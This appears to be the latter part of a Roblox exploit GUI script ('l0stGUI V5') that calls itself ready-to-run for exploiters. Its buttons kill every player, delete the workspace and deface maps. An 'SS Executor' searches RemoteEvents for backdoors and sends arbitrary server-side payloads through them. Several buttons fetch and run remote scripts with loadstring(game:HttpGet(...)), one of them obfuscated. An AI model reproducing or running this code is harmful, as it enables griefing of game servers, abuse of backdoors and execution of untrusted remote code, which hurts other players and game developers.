G2L["38"]["BorderSizePixel"] = 0;
G2L["38"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 255);
G2L["38"]["Size"] = UDim2.new(0, 8, 0, 314);
G2L["38"]["Position"] = UDim2.new(1, 0, 0.07308, 0);
G2L["38"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["39"] = Instance.new("Frame", G2L["2"]);
G2L["39"]["BorderSizePixel"] = 0;
G2L["39"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 128);
G2L["39"]["Size"] = UDim2.new(0, 551, 0, 112);
G2L["39"]["Position"] = UDim2.new(0, 0, 0.99955, 0);
G2L["39"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame.TextLabel
G2L["3a"] = Instance.new("TextLabel", G2L["39"]);
G2L["3a"]["TextWrapped"] = true;
G2L["3a"]["BorderSizePixel"] = 0;
G2L["3a"]["TextSize"] = 14;
G2L["3a"]["TextScaled"] = true;
G2L["3a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3a"]["BackgroundTransparency"] = 1;
G2L["3a"]["Size"] = UDim2.new(0, 543, 0, 112);
G2L["3a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3a"]["Text"] = [[Thank you for using l0stGUI V5! This means huge support to me! This was made in ROBLOX Studio then turned into a Lua code using a plugin for it to be ready-to-run for exploiters just like you! Note: Server destruction only works in games with ReplicationFiltering disabled!]];
G2L["3a"]["Position"] = UDim2.new(-0, 0, 0, 0);


-- StarterGui.ScreenGui.MainFrame.Frame
G2L["3b"] = Instance.new("Frame", G2L["2"]);
G2L["3b"]["BorderSizePixel"] = 0;
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(0, 86, 255);
G2L["3b"]["Size"] = UDim2.new(0, 551, 0, 11);
G2L["3b"]["Position"] = UDim2.new(0, 0, 0.96582, 0);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MinimizeFrame
G2L["3c"] = Instance.new("Frame", G2L["1"]);
G2L["3c"]["BorderSizePixel"] = 0;
G2L["3c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3c"]["Size"] = UDim2.new(0, 44, 0, 41);
G2L["3c"]["Position"] = UDim2.new(0.76775, 0, 0.15578, 0);
G2L["3c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3c"]["Name"] = [[MinimizeFrame]];
G2L["3c"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.MinimizeFrame.ImageButton
G2L["3d"] = Instance.new("ImageButton", G2L["3c"]);
G2L["3d"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["3d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3d"]["Image"] = [[rbxassetid://113344681360516]];
G2L["3d"]["Size"] = UDim2.new(0, 49, 0, 47);
G2L["3d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.MinimizeFrame.ImageButton.LocalScript
G2L["3e"] = Instance.new("LocalScript", G2L["3d"]);



-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_a()
local script = G2L["a"];
	local Players = game:GetService("Players")
	local LocalPlayer = Players.LocalPlayer
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local char = LocalPlayer.Character
		if char and char:FindFirstChild("Humanoid") then
			char.Humanoid.Health = 0
		end
	
		-- Attempt to kill all players (only works in FD or exploitable games)
		for _, player in pairs(Players:GetPlayers()) do
			if player.Character and player.Character:FindFirstChild("Humanoid") then
				player.Character.Humanoid.Health = 0
			end
		end
	end)
end;
task.spawn(C_a);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_c()
local script = G2L["c"];
	local button = script.Parent
	
	local decalId = "93848128951517" -- Replace with your own valid image ID
	local asset = "rbxassetid://" .. 93848128951517
	
	button.MouseButton1Click:Connect(function()
		-- Remove existing skyboxes
		for _, v in pairs(game.Lighting:GetChildren()) do
			if v:IsA("Sky") then v:Destroy() end
		end
	
		-- Create and apply new skybox
		local skybox = Instance.new("Sky")
		skybox.Name = "CustomSky"
		skybox.SkyboxBk = asset
		skybox.SkyboxDn = asset
		skybox.SkyboxFt = asset
		skybox.SkyboxLf = asset
		skybox.SkyboxRt = asset
		skybox.SkyboxUp = asset
		skybox.Parent = game.Lighting
	end)
end;
task.spawn(C_c);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_e()
local script = G2L["e"];
	local button = script.Parent
	
	-- Replace with your desired decal ID
	local decalId = "136865247774102"
	local asset = "rbxassetid://" .. 136865247774102
	
	-- All six faces of a part
	local faces = {
		Enum.NormalId.Front,
		Enum.NormalId.Back,
		Enum.NormalId.Top,
		Enum.NormalId.Bottom,
		Enum.NormalId.Left,
		Enum.NormalId.Right
	}
	
	button.MouseButton1Click:Connect(function()
		for _, part in ipairs(workspace:GetDescendants()) do
			if part:IsA("BasePart") then
				-- Remove existing decals
				for _, child in ipairs(part:GetChildren()) do
					if child:IsA("Decal") then
						child:Destroy()
					end
				end
	
				-- Apply new decal to all faces
				for _, face in ipairs(faces) do
					local decal = Instance.new("Decal")
					decal.Texture = asset
					decal.Face = face
					decal.Parent = part
				end
			end
		end
	end)
end;
task.spawn(C_e);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_10()
local script = G2L["10"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		for _, part in ipairs(workspace:GetDescendants()) do
			if part:IsA("BasePart") then
				part.Anchored = false
			end
		end
	end)
end;
task.spawn(C_10);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_12()
local script = G2L["12"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local water = Instance.new("Part")
		water.Name = "FloodZone"
		water.Size = Vector3.new(2048, 300, 2048)
		water.Position = Vector3.new(0, 150, 0) -- Adjust height as needed
		water.Anchored = true
		water.Material = Enum.Material.Water
		water.Transparency = 0.25
		water.CanCollide = false
		water.Parent = workspace
	end)
end;
task.spawn(C_12);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_14()
local script = G2L["14"];
	local button = script.Parent
	
	-- Replace with your desired audio ID
	local soundId = "95156028272944"
	local playbackSpeed = 0.2 -- Adjust this for pitch/speed
	
	button.MouseButton1Click:Connect(function()
		-- Remove any existing sounds named "RitualMusic"
		for _, s in ipairs(workspace:GetChildren()) do
			if s:IsA("Sound") and s.Name == "RitualMusic" then
				s:Destroy()
			end
		end
	
		-- Create new sound
		local sound = Instance.new("Sound")
		sound.Name = "RitualMusic"
		sound.SoundId = "rbxassetid://" .. soundId
		sound.Looped = true
		sound.PlaybackSpeed = playbackSpeed
		sound.Volume = 1
		sound.Parent = workspace
		sound:Play()
	end)
end;
task.spawn(C_14);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_16()
local script = G2L["16"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		for _, obj in ipairs(workspace:GetChildren()) do
			-- Optional: preserve essential services like Terrain or Camera
			if not obj:IsA("Terrain") and not obj:IsA("Camera") then
				obj:Destroy()
			end
		end
	end)
end;
task.spawn(C_16);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_18()
local script = G2L["18"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		--[=[
	 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
	88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
	88      88    88    88            odD'      88      88    88 88ooo88 
	88  ooo 88    88    88          .88'        88      88    88 88~~~88 
	88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
	 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
	]=]
	
		-- Instances: 13 | Scripts: 3 | Modules: 0 | Tags: 0
		local G2L = {};
	
		-- StarterGui.ScreenGui
		G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
		G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
	
	
		-- StarterGui.ScreenGui.Frame
		G2L["2"] = Instance.new("Frame", G2L["1"]);
		G2L["2"]["BorderSizePixel"] = 0;
		G2L["2"]["BackgroundColor3"] = Color3.fromRGB(0, 42, 204);
		G2L["2"]["Size"] = UDim2.new(0, 312, 0, 337);
		G2L["2"]["Position"] = UDim2.new(0.43507, 0, 0.20477, 0);
		G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		G2L["3"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		G2L["4"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.ScreenGui.Frame.ImageLabel
		G2L["5"] = Instance.new("ImageLabel", G2L["2"]);
		G2L["5"]["BorderSizePixel"] = 0;
		G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
		G2L["5"]["Image"] = [[rbxassetid://103157789766561]];
		G2L["5"]["Size"] = UDim2.new(0, 290, 0, 149);
		G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["5"]["BackgroundTransparency"] = 1;
		G2L["5"]["Position"] = UDim2.new(0.03391, 0, 0.14147, 0);
	
	
		-- StarterGui.ScreenGui.Frame.TextLabel
		G2L["6"] = Instance.new("TextLabel", G2L["2"]);
		G2L["6"]["TextWrapped"] = true;
		G2L["6"]["BorderSizePixel"] = 0;
		G2L["6"]["TextSize"] = 14;
		G2L["6"]["TextScaled"] = true;
		G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["6"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["6"]["BackgroundTransparency"] = 1;
		G2L["6"]["Size"] = UDim2.new(0, 312, 0, 26);
		G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["6"]["Text"] = [[l0stk1dd88's SS Executor]];
	
	
		-- StarterGui.ScreenGui.Frame.Execute
		G2L["7"] = Instance.new("TextButton", G2L["2"]);
		G2L["7"]["TextWrapped"] = true;
		G2L["7"]["BorderSizePixel"] = 0;
		G2L["7"]["TextSize"] = 14;
		G2L["7"]["TextScaled"] = true;
		G2L["7"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["7"]["Size"] = UDim2.new(0, 91, 0, 39);
		G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["7"]["Text"] = [[Execute]];
		G2L["7"]["Name"] = [[Execute]];
		G2L["7"]["Position"] = UDim2.new(0.03205, 0, 0.60348, 0);
	
	
		-- StarterGui.ScreenGui.Frame.Clear
		G2L["8"] = Instance.new("TextButton", G2L["2"]);
		G2L["8"]["TextWrapped"] = true;
		G2L["8"]["BorderSizePixel"] = 0;
		G2L["8"]["TextSize"] = 14;
		G2L["8"]["TextScaled"] = true;
		G2L["8"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["8"]["Size"] = UDim2.new(0, 91, 0, 39);
		G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["8"]["Text"] = [[Clear]];
		G2L["8"]["Name"] = [[Clear]];
		G2L["8"]["Position"] = UDim2.new(0.35256, 0, 0.60348, 0);
	
	
		-- StarterGui.ScreenGui.Frame.Inject
		G2L["9"] = Instance.new("TextButton", G2L["2"]);
		G2L["9"]["TextWrapped"] = true;
		G2L["9"]["BorderSizePixel"] = 0;
		G2L["9"]["TextSize"] = 14;
		G2L["9"]["TextScaled"] = true;
		G2L["9"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["9"]["Size"] = UDim2.new(0, 91, 0, 39);
		G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["9"]["Text"] = [[Inject]];
		G2L["9"]["Name"] = [[Inject]];
		G2L["9"]["Position"] = UDim2.new(0.66987, 0, 0.60348, 0);
	
	
		-- StarterGui.ScreenGui.Frame.TextBox
		G2L["a"] = Instance.new("TextBox", G2L["2"]);
		G2L["a"]["CursorPosition"] = -1;
		G2L["a"]["PlaceholderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["a"]["BorderSizePixel"] = 0;
		G2L["a"]["TextWrapped"] = true;
		G2L["a"]["TextSize"] = 14;
		G2L["a"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["a"]["TextScaled"] = true;
		G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["a"]["PlaceholderText"] = [[Enter SS Script or require() here]];
		G2L["a"]["Size"] = UDim2.new(0, 290, 0, 149);
		G2L["a"]["Position"] = UDim2.new(0.03205, 0, 0.1405, 0);
		G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["a"]["Text"] = [[]];
		G2L["a"]["BackgroundTransparency"] = 1;
	
	
		-- StarterGui.ScreenGui.Frame.polaria
		G2L["b"] = Instance.new("TextButton", G2L["2"]);
		G2L["b"]["TextWrapped"] = true;
		G2L["b"]["BorderSizePixel"] = 0;
		G2L["b"]["TextSize"] = 14;
		G2L["b"]["TextScaled"] = true;
		G2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["b"]["Size"] = UDim2.new(0, 141, 0, 58);
		G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["b"]["Text"] = [[Polaria]];
		G2L["b"]["Name"] = [[polaria]];
		G2L["b"]["Position"] = UDim2.new(0.03205, 0, 0.75481, 0);
	
	
		-- StarterGui.ScreenGui.Frame.c00lgui
		G2L["c"] = Instance.new("TextButton", G2L["2"]);
		G2L["c"]["TextWrapped"] = true;
		G2L["c"]["BorderSizePixel"] = 0;
		G2L["c"]["TextSize"] = 14;
		G2L["c"]["TextScaled"] = true;
		G2L["c"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["c"]["Size"] = UDim2.new(0, 137, 0, 58);
		G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["c"]["Text"] = [[C00lgui]];
		G2L["c"]["Name"] = [[c00lgui]];
		G2L["c"]["Position"] = UDim2.new(0.52244, 0, 0.75481, 0);
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		G2L["d"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		local function C_3()
			local script = G2L["3"];
			local replicatedStorage = game:GetService("ReplicatedStorage")
	
			-- GUI references
			local gui = script.Parent
			local textbox = gui:FindFirstChild("TextBox")
			local executeButton = gui:FindFirstChild("Execute")
			local clearButton = gui:FindFirstChild("Clear")
			local injectButton = gui:FindFirstChild("Inject")
	
			-- Safety check
			if not textbox or not executeButton or not clearButton or not injectButton then
				warn("Missing GUI components.")
				return
			end
	
			-- Execute payload from textbox
			executeButton.MouseButton1Click:Connect(function()
				local payload = textbox.Text
				if payload and payload ~= "" then
					local remote = replicatedStorage:FindFirstChild("Backdoor") or replicatedStorage:FindFirstChild("RemoteEvent") or replicatedStorage:FindFirstChild("RE")
					if remote and remote:IsA("RemoteEvent") then
						remote:FireServer(payload)
					end
				end
			end)
	
			-- Clear textbox
			clearButton.MouseButton1Click:Connect(function()
				textbox.Text = ""
			end)
	
			-- Inject: Loop through all RemoteEvents and test for backdoor execution
			injectButton.MouseButton1Click:Connect(function()
				local testPayload = 'print("Backdoor test from GAMING")'
				local found = false
	
				for _, obj in ipairs(replicatedStorage:GetChildren()) do
					if obj:IsA("RemoteEvent") then
						local success = pcall(function()
							obj:FireServer(testPayload)
						end)
	
						if success then
							found = true
							print("Successfully injected into RemoteEvent! Remote name: " .. obj.Name)
							break -- Stop after first successful injection
						end
					end
				end
	
				if not found then
					print("No active backdoor RemoteEvent found.")
				end
			end)
		end;
		task.spawn(C_3);
		-- StarterGui.ScreenGui.Frame.LocalScript
		local function C_4()
			local script = G2L["4"];
			local frame = script.Parent
			local dragging = false
			local dragInput, mousePos, framePos
	
			frame.InputBegan:Connect(function(input)
				if input.UserInputType == Enum.UserInputType.MouseButton1 then
					dragging = true
					mousePos = input.Position
					framePos = frame.Position
					input.Changed:Connect(function()
						if input.UserInputState == Enum.UserInputState.End then
							dragging = false
						end
					end)
				end
			end)
	
			frame.InputChanged:Connect(function(input)
				if input.UserInputType == Enum.UserInputType.MouseMovement then
					dragInput = input
				end
			end)
	
			game:GetService("UserInputService").InputChanged:Connect(function(input)
				if input == dragInput and dragging then
					local delta = input.Position - mousePos
					frame.Position = UDim2.new(framePos.X.Scale, framePos.X.Offset + delta.X, framePos.Y.Scale, framePos.Y.Offset + delta.Y)
				end
			end)
	
		end;
		task.spawn(C_4);
		-- StarterGui.ScreenGui.Frame.LocalScript
		local function C_d()
			local script = G2L["d"];
			local player = game.Players.LocalPlayer
			local username = player.Name
	
			local gui = script.Parent
			local textbox = gui:FindFirstChild("TextBox")
			local c00lguiButton = gui:FindFirstChild("c00lgui")
			local polariaButton = gui:FindFirstChild("polaria")
	
			-- Replace these with your actual module IDs
			local c00lguiID = 123456789
			local polariaID = 987654321
	
			-- Button: c00lgui
			c00lguiButton.MouseButton1Click:Connect(function()
				if textbox then
					textbox.Text = 'require(14125553864):Fire("' .. username .. '","c00lkidd")'
				end
			end)
	
			-- Button: polaria
			polariaButton.MouseButton1Click:Connect(function()
				if textbox then
					textbox.Text = 'require(' .. 123255432303221 .. '):Pload("' .. username .. '")'
				end
			end)
		end;
		task.spawn(C_d);
	
		return G2L["1"], require;
	end)
end;
task.spawn(C_18);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_1a()
local script = G2L["1a"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
	end)
end;
task.spawn(C_1a);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_1c()
local script = G2L["1c"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_rf6iQURzu1fqrytcnLBAvW34C9N55kS9g9G3CKz086rC47M6632sEd4ZZYB0AYgV.lua.txt'),true))()
	end)
end;
task.spawn(C_1c);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_1e()
local script = G2L["1e"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/78n/SimpleSpy/main/SimpleSpyBeta.lua"))()
	end)
end;
task.spawn(C_1e);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_20()
local script = G2L["20"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/its-LALOL/LALOL-Hub/main/Backdoor-Scanner/script"))()
	end)
end;
task.spawn(C_20);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_22()
local script = G2L["22"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/randomizedcomponent/UC/refs/heads/main/3307468c285f4fe535fb5d87b4b053e6.lua"))()
	end)
end;
task.spawn(C_22);
-- StarterGui.ScreenGui.MainFrame.Frame.SpeedInput.LocalScript
local function C_26()
local script = G2L["26"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_26);
-- StarterGui.ScreenGui.MainFrame.Frame.SpeedExecute.LocalScript
local function C_28()
local script = G2L["28"];
	local button = script.Parent
	local speedBox = button.Parent:WaitForChild("SpeedInput")
	
	button.MouseButton1Click:Connect(function()
		local speed = tonumber(speedBox.Text)
		if speed and speed > 0 then
			local character = game.Players.LocalPlayer.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.WalkSpeed = speed
				end
			end
		end
	end)
end;
task.spawn(C_28);
-- StarterGui.ScreenGui.MainFrame.Frame.JumpPowerExecute.LocalScript
local function C_2a()
local script = G2L["2a"];
	local button = script.Parent
	local frame = button.Parent
	local jumpBox = frame:FindFirstChild("JumpInput")
	
	button.MouseButton1Click:Connect(function()
		local jumpPower = tonumber(jumpBox.Text)
		if not jumpPower or jumpPower <= 0 then
			warn("Invalid JumpPower input")
			return
		end
	
		local player = game:GetService("Players").LocalPlayer
		local function applyJumpPower()
			local character = player.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.UseJumpPower = true -- ✅ Important for newer Roblox behavior
					humanoid.JumpPower = jumpPower
					print("JumpPower set to:", jumpPower)
				end
			end
		end
	
		-- If character isn't loaded yet, wait for it
		if not player.Character then
			player.CharacterAdded:Wait()
		end
		applyJumpPower()
	end)
end;
task.spawn(C_2a);
-- StarterGui.ScreenGui.MainFrame.Frame.JumpInput.LocalScript
local function C_2c()
local script = G2L["2c"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_2c);
-- StarterGui.ScreenGui.MainFrame.Frame.GravityInput.LocalScript
local function C_2e()
local script = G2L["2e"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_2e);
-- StarterGui.ScreenGui.MainFrame.Frame.GravityExecute.LocalScript
local function C_30()
local script = G2L["30"];
	local button = script.Parent
	local speedBox = button.Parent:WaitForChild("SpeedInput")
	
	button.MouseButton1Click:Connect(function()
		local speed = tonumber(speedBox.Text)
		if speed and speed > 0 then
			local character = game.Players.LocalPlayer.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.WalkSpeed = speed
				end
			end
		end
	end)
end;
task.spawn(C_30);
-- StarterGui.ScreenGui.MainFrame.Frame.GravityExecute.LocalScript
local function C_31()
local script = G2L["31"];
	local button = script.Parent
	local gravityBox = button.Parent:FindFirstChild("GravityInput")
	
	button.MouseButton1Click:Connect(function()
		local gravity = tonumber(gravityBox.Text)
		if gravity and gravity > 0 then
			game.Workspace.Gravity = gravity
			print("Gravity set to:", gravity)
		else
			warn("Invalid gravity input")
		end
	end)
end;
task.spawn(C_31);
-- StarterGui.ScreenGui.MainFrame.Frame.MusicInput.LocalScript
local function C_33()
local script = G2L["33"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_33);
-- StarterGui.ScreenGui.MainFrame.Frame.ExecuteMusic.LocalScript
local function C_36()
local script = G2L["36"];
	local button = script.Parent
	local speedBox = button.Parent:WaitForChild("SpeedInput")
	
	button.MouseButton1Click:Connect(function()
		local speed = tonumber(speedBox.Text)
		if speed and speed > 0 then
			local character = game.Players.LocalPlayer.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.WalkSpeed = speed
				end
			end
		end
	end)
end;
task.spawn(C_36);
-- StarterGui.ScreenGui.MainFrame.Frame.ExecuteMusic.LocalScript
local function C_37()
local script = G2L["37"];
	local button = script.Parent
	local frame = button.Parent
	local idBox = frame:FindFirstChild("MusicInput")
	local speedBox = frame:FindFirstChild("MusicSpeed")
	
	button.MouseButton1Click:Connect(function()
		local soundId = idBox.Text
		local playbackSpeed = tonumber(speedBox.Text)
	
		if soundId == "" or not playbackSpeed or playbackSpeed <= 0 then
			warn("Invalid input")
			return
		end
	
		-- Remove any existing music
		for _, s in ipairs(workspace:GetChildren()) do
			if s:IsA("Sound") and s.Name == "CustomMusic" then
				s:Destroy()
			end
		end
	
		-- Create new sound
		local sound = Instance.new("Sound")
		sound.Name = "CustomMusic"
		sound.SoundId = "rbxassetid://" .. soundId
		sound.Looped = true
		sound.PlaybackSpeed = playbackSpeed
		sound.Volume = 1
		sound.Parent = workspace
		sound:Play()
	end)
end;
task.spawn(C_37);
-- StarterGui.ScreenGui.MinimizeFrame.ImageButton.LocalScript
local function C_3e()
local script = G2L["3e"];
	local button = script.Parent
	local mainFrame = button.Parent:FindFirstChild("MainFrame") or button.Parent.Parent:FindFirstChild("MainFrame")
	
	button.MouseButton1Click:Connect(function()
		if mainFrame then
			mainFrame.Visible = not mainFrame.Visible
		else
			warn("MainFrame not found")
		end
	end)
end;
task.spawn(C_3e);

return G2L["1"], require;
